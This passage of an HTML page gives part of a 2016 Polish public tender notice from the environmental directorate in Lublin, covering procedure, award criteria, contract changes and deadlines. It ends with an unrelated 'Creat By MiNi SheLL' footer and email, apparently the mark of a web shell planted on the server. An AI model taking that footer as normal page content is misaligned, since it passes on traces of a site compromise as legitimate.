dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby
uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu
zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy: 1)zmniejszenie zakresu przedmiotu zamówienia, gdy jego wykonanie w
pierwotnym zakresie nie leży w interesie Zamawiającego; 2)zmiana terminu realizacji przedmiotu zamówienia, w przypadku niesprzyjających
warunków atmosferycznych np. zalegający śnieg temperatura powietrza poniżej 0`C itp., uniemożliwiające wykonanie Umowy w określonym
pierwotnie terminie oraz opóźniający się wegetacyjny okres fenologiczny; 3)zmiana osób będących przedstawicielami stron wymienionych w § 5
ust. 1 i 2. 2. Zmiany umowy przewidziane w ust. 1 dopuszczalne są na następujących warunkach: - ad pkt 1) - zmniejszenie zakresu przedmiotu
umowy w granicach uzasadnionego interesu Zamawiającego, - ad pkt 2) - zmiana terminu realizacji przedmiotu zamówienia o okres działania
niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie przedmiotu Umowy w pierwotnie określonym terminie. - ad pkt 3) -
w przypadku śmierci, rozwiązania umowy o pracę, długotrwałej choroby, zmian personalnych w strukturze organizacyjnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.rdos.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalna Dyrekcja Ochrony Środowiska w Lublinie -
20-144 Lublin, ul. Bazylianówka 46, pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 10:30, miejsce: Regionalna Dyrekcja Ochrony Środowiska w Lublinie - 20-144 Lublin, ul. Bazylianówka 46, pokój nr 17 (sekretariat - I piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Przedmiot
zamówienia jest finansowany ze środków Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014 w ramach Programu
Operacyjnego PL02 /Ochrona różnorodności biologicznej i ekosystemów/ 2.Osobami upoważnionymi do kontaktowania się z wykonawcami są:
2.1.W zakresie przedmiotu zamówienia: p. Małgorzata Polkowska. 2.2.W zakresie procedury: p. Krzysztof Bartosik..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com